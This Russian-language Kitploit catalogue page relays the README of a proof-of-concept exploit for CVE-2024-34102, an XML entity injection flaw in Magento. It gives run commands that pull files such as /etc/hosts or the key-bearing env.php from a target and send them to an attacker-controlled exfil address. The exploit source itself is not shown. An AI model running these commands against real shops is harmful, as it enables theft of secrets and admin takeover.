Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-34102 — Proof-of-concept эксплойт для CVE-2024-34102, критической инъекции XML-сущностей в Magento, позволяющей выгрузку конфиденциальных файлов и несанкционированный доступ к администратору. Только для образовательных целей. | Kitploit
Инструменты/GitHubGitHub/mksundaram69/cve-2024-34102
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийЭксфильтрация данныхОбучение и Образование
GitHubmksundaram69/cve-2024-34102

CVE-2024-34102

Proof-of-concept эксплойт для CVE-2024-34102, критической инъекции XML-сущностей в Magento, позволяющей выгрузку конфиденциальных файлов и несанкционированный доступ к администратору. Только для образовательных целей.

Репозиторий
61 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

🇮🇱 #BringThemHome #NeverAgainIsNow 🇮🇱

Мы требуем безопасного возвращения всех граждан, взятых в заложники террористической группировкой ХАМАС. Мы не успокоимся, пока каждый заложник не будет освобождён и не вернётся домой в безопасности. Вы можете помочь вернуть их домой. https://stories.bringthemhomenow.net/

CVE-2024-34102 PoC 🚀

Этот репозиторий содержит proof-of-concept (PoC) эксплойт для критической уязвимости внедрения XML-сущностей (CVE-2024-34102) в Magento. Эта уязвимость позволяет извлекать конфиденциальные файлы, которые затем могут быть использованы для получения несанкционированного доступа к административным функциям Magento. Данный эксплойт предназначен для образовательных целей и должен использоваться ответственно.

Обзор 📖

Magento — одно из самых популярных решений для электронной коммерции, используемых по всему миру. В июне 2024 года была обнаружена критическая уязвимость внедрения XML-сущностей без предварительной аутентификации, идентифицированная как CVE-2024-34102. Эта уязвимость может привести к серьёзным последствиям, включая извлечение файла app/etc/env.php из Magento, который содержит криптографические ключи, используемые для подписи JWT.

Возможности 🌟

  • Извлечение конфиденциальных файлов из уязвимого экземпляра Magento.
  • Простое и понятное использование.
  • Образовательная демонстрация внедрения XML-сущностей.

Использование 🚀

Предварительные требования

  • Python 3.x
  • Библиотека requests (pip install requests)

Запуск эксплойта

  1. Клонируйте репозиторий:

    root@kitploit:~
    git clone https://github.com/yourusername/CVE-2024-34102-exploit.git
    cd CVE-2024-34102-exploit
    
  2. Выполните скрипт с необходимыми аргументами:

    root@kitploit:~
    python cve_2024_34102_exploit.py --target-url http://example.com --target-file /etc/hosts --exfil-url your_ip:9999
    

Аргументы командной строки

  • --target-url: URL целевого экземпляра Magento.
  • --target-file: путь к файлу на целевом сервере для извлечения.
  • --exfil-url: URL для получения извлечённых данных.

Пример 🌐

root@kitploit:~
python cve_2024_34102_exploit.py --target-url http://example.com --target-file /etc/hosts --exfil-url your_ip:9999
Скачать инструмент